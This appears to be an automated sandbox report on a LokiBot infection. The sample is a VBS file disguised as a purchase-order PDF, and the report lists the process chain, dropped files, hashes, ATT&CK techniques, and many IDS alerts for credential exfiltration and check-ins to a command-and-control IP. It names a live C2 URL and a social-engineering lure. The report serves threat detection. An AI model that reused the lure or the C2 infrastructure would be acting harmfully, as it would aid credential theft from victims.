                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: dump.pcap, type: PCAP
                Source: Yara match File source: 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 2584, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                Remote Access Functionality

                Source: Yara match File source: dump.pcap, type: PCAP
                Source: Yara match File source: 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 2584, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 141 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 141 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                [Behavior graph, ID 1523156. Sample: SOLICITUD DE PEDIDO (Univer... Start date: 01/10/2024. Architecture: WINDOWS. Score: 100. Process tree: wscript.exe started powershell.exe, which contacted drive.google.com and drive.usercontent.google.com; a second powershell.exe started msiexec.exe and conhost.exe; msiexec.exe contacted 137.184.191.215 and dropped C:\Users\user\AppData\Roaming\...\31437F.exe (PE32).]

                Source | Detection | Scanner | Label | Link
                SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | 8% | ReversingLabs | Win32.Trojan.Generic |
                SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | 13% | Virustotal | | Browse

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\188E93\31437F.exe | 0% | ReversingLabs | |
                C:\Users\user\AppData\Roaming\188E93\31437F.exe | 0% | Virustotal | | Browse

                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                drive.google.com | 0% | Virustotal | | Browse
                drive.usercontent.google.com | 1% | Virustotal | | Browse

                Source | Detection | Scanner | Label | Link
                http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
                http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                http://crl.microsoft | 0% | URL Reputation | safe |
                https://go.micro | 0% | URL Reputation | safe |
                https://contoso.com/License | 0% | URL Reputation | safe |
                https://contoso.com/Icon | 0% | URL Reputation | safe |
                https://contoso.com/ | 0% | URL Reputation | safe |
                https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                https://aka.ms/pscore68 | 0% | URL Reputation | safe |
                https://apis.google.com | 0% | URL Reputation | safe |
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                http://drive.usercontent.google.com | 1% | Virustotal | | Browse
                https://github.com/Pester/Pester | 1% | Virustotal | | Browse
                https://www.google.com | 0% | Virustotal | | Browse
                http://drive.google.com | 0% | Virustotal | | Browse
                http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse
                https://drive.usercontent.google.com/ | 1% | Virustotal | | Browse
                https://drive.google.com | 0% | Virustotal | | Browse
                https://drive.google.com/ | 0% | Virustotal | | Browse
                http://137.184.191.215/index.php/check.php?s=am9ntjjw | 15% | Virustotal | | Browse
                https://drive.usercontent.google.com | 1% | Virustotal | | Browse

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                drive.google.com | 142.250.184.238 | true | false | | unknown
                drive.usercontent.google.com | 142.250.184.193 | true | false | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                http://137.184.191.215/index.php/check.php?s=am9ntjjw | true | | unknown

                            IP | Domain | Country | ASN | ASN Name | Malicious
                            142.250.184.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                            137.184.191.215 | unknown | United States | 11003 | PANDGUS | true
                            142.250.184.238 | drive.google.com | United States | 15169 | GOOGLEUS | false

                            Joe Sandbox version: 41.0.0 Charoite
                            Analysis ID: 1523156
                            Start date and time: 2024-10-01 07:42:00 +02:00
                            Joe Sandbox product: CloudBasic
                            Overall analysis duration: 0h 7m 13s
                            Hypervisor based Inspection enabled: false
                            Report type: full
                            Cookbook file name: default.jbs
                            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed: 10
                            Number of new started drivers analysed: 0
                            Number of existing processes analysed: 0
                            Number of existing drivers analysed: 0
                            Number of injected processes analysed: 0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode: default
                            Analysis stop reason: Timeout
                            Sample name: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
                            renamed because original name is a hash value
                            Original Sample Name: SOLICITUD DE PEDIDO (Universidade de So Paulo (USP))09-30-2024pdf.vbs
                            Detection: MAL
                            Classification: mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
                            EGA Information: Failed
                            HCA Information:
                            • Successful, ratio: 86%
                            • Number of executed functions: 35
                            • Number of non-executed functions: 1
                            Cookbook Comments:
                            • Found application associated with file extension: .vbs
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target msiexec.exe, PID 2584 because there are no executed function
                            • Execution Graph export aborted for target powershell.exe, PID 5588 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 5972 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:42:57 | API Interceptor | 88x Sleep call for process: powershell.exe modified
01:43:41 | API Interceptor | 28x Sleep call for process: msiexec.exe modified
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8003
                                      Entropy (8bit):4.840877972214509
                                      Encrypted:false
                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                      MD5:106D01F562D751E62B702803895E93E0
                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllulbnolz:NllUc
                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e................................................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):59904
                                      Entropy (8bit):5.770776695007155
                                      Encrypted:false
                                      SSDEEP:768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
                                      MD5:9D09DC1EDA745A5F87553048E57620CF
                                      SHA1:1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
                                      SHA-256:3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
                                      SHA-512:2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: Bnnebgers.vbs, Detection: malicious, Browse
                                      • Filename: C7jdH7geD6.exe, Detection: malicious, Browse
                                      • Filename: setup.exe, Detection: malicious, Browse
                                      • Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious, Browse
                                      • Filename: sample.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...tkq.tkq.tkq.`.r.skq.`.t.zkq.`.p.ykq.tkp..kq.`.x.wkq.`.u.=kq.`...ukq.`.s.ukq.Richtkq.........PE..L....E.%.....................^......0.............@.......................... ......\.....@...... ...................................................................(..T...............................@.......................@....................text...d........................... ..`.data...............................@....idata..............................@..@.didat..L...........................@....rsrc............ ..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):47
                                      Entropy (8bit):1.168829563685559
                                      Encrypted:false
                                      SSDEEP:3:/lSll2DQi:AoMi
                                      MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                      SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                      SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                      SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                      Malicious:false
                                      Preview:........................................user.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):461600
                                      Entropy (8bit):5.957335301260107
                                      Encrypted:false
                                      SSDEEP:6144:bKdcsXZVrd+5wyjTrMzq8EfyCxpwhwn1PkXwxjEgj/p9pJMXMr270G0Rzns7ZU:m2YZVsfeq8EfPxpDn5tZEIvpQgnRzmm
                                      MD5:1521E3592BA392D4637215A10F3CEA58
                                      SHA1:9E384CA5D1E60ED2DDE3318DF27EB42DC898E944
                                      SHA-256:92C6A957B74A05D545E693BE9A5726DF0B6192517D3B60922A53C33DC6036D0B
                                      SHA-512:F3ED6AD10EC73D5BF1AD4F253A2D078D3CBD31779DA08E6B475814C59AD1B7C9C9A446D181DE7E36CB447847ADF8D9754DB65870BC22751FBDF867F8EC587E19
                                      Malicious:false
                                      File type:ASCII text, with CRLF line terminators
                                      Entropy (8bit):4.914998043107827
                                      TrID:
                                      • Visual Basic Script (13500/0) 100.00%
                                      File name:SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
                                      File size:80'375 bytes
                                      MD5:8de3bba9fb959d08b3719f1281957c56
                                      SHA1:b8132af0e02ecb58c3c3eb39fe919e3b805106cf
                                      SHA256:c2df6879029285a4edb1e60526812177c3ac1b7293e5b5f05d8250d682641e25
                                      SHA512:8024de858f6d4ec08728944183309650f3f0a7fdc7e83eee53852d00efc37f845ff03bbca42ccd0284282e29c38937a82004bf1b8c3ce439ccc93714fa02f93c
                                      SSDEEP:1536:sUjz/4d4EMT6SUAQZWwGcKQeH+4my6lGiYeJztAxUCDYf:sUjsLAgWO4mF1YhQf
                                      TLSH:1273921FC78405390961C29BEB733D09A47CCCB731924AE8A74906CD9E0267C9E7A97F
                                      File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
                                      Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-01T07:43:30.047966+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49714 | 142.250.184.238 | 443 | TCP
2024-10-01T07:43:34.551355+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:34.551355+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:37.245797+0200 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:37.322517+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:37.322517+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:40.069355+0200 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:40.185853+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:40.185853+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:42.828237+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:42.828237+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:43.003130+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:43.003130+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:45.589348+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:45.589348+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:45.741448+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49720 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:45.741448+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49720 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:48.330751+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49720 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:48.330751+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49720 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:48.572785+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:48.572785+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:51.195415+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:51.195415+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:51.351558+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:51.351558+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:53.977861+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:53.977861+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:54.132906+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:54.132906+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:57.727197+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:57.727197+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:57.879403+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:57.879403+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:00.486167+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:00.486167+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:00.649720+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:00.649720+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:03.214345+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:03.214345+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:03.369738+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:03.369738+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:06.087551+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:06.087551+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:06.239645+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:06.239645+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:08.879359+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:08.879359+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
                                      2024-10-01T07:44:09.041359+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549729137.184.191.21580TCP
                                      2024-10-01T07:44:09.041359+02002025381ET MALWARE LokiBot Checkin1192.168.2.549729137.184.191.21580TCP
                                      2024-10-01T07:44:11.705337+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549729137.184.191.21580TCP
                                      2024-10-01T07:44:11.705337+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549729137.184.191.21580TCP
                                      2024-10-01T07:44:11.889231+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549731137.184.191.21580TCP
                                      2024-10-01T07:44:11.889231+02002025381ET MALWARE LokiBot Checkin1192.168.2.549731137.184.191.21580TCP
                                      2024-10-01T07:44:15.545751+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549731137.184.191.21580TCP
                                      2024-10-01T07:44:15.545751+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549731137.184.191.21580TCP
                                      2024-10-01T07:44:15.693620+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549732137.184.191.21580TCP
                                      2024-10-01T07:44:15.693620+02002025381ET MALWARE LokiBot Checkin1192.168.2.549732137.184.191.21580TCP
                                      2024-10-01T07:44:18.317194+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549732137.184.191.21580TCP
                                      2024-10-01T07:44:18.317194+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549732137.184.191.21580TCP
                                      2024-10-01T07:44:18.475108+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549733137.184.191.21580TCP
                                      2024-10-01T07:44:18.475108+02002025381ET MALWARE LokiBot Checkin1192.168.2.549733137.184.191.21580TCP
                                      2024-10-01T07:44:21.054335+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549733137.184.191.21580TCP
                                      2024-10-01T07:44:21.054335+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549733137.184.191.21580TCP
                                      2024-10-01T07:44:21.209924+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549734137.184.191.21580TCP
                                      2024-10-01T07:44:21.209924+02002025381ET MALWARE LokiBot Checkin1192.168.2.549734137.184.191.21580TCP
                                      2024-10-01T07:44:23.780395+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549734137.184.191.21580TCP
                                      2024-10-01T07:44:23.780395+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549734137.184.191.21580TCP
                                      2024-10-01T07:44:23.931600+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549735137.184.191.21580TCP
                                      2024-10-01T07:44:23.931600+02002025381ET MALWARE LokiBot Checkin1192.168.2.549735137.184.191.21580TCP
                                      2024-10-01T07:44:26.561735+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549735137.184.191.21580TCP
                                      2024-10-01T07:44:26.561735+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549735137.184.191.21580TCP
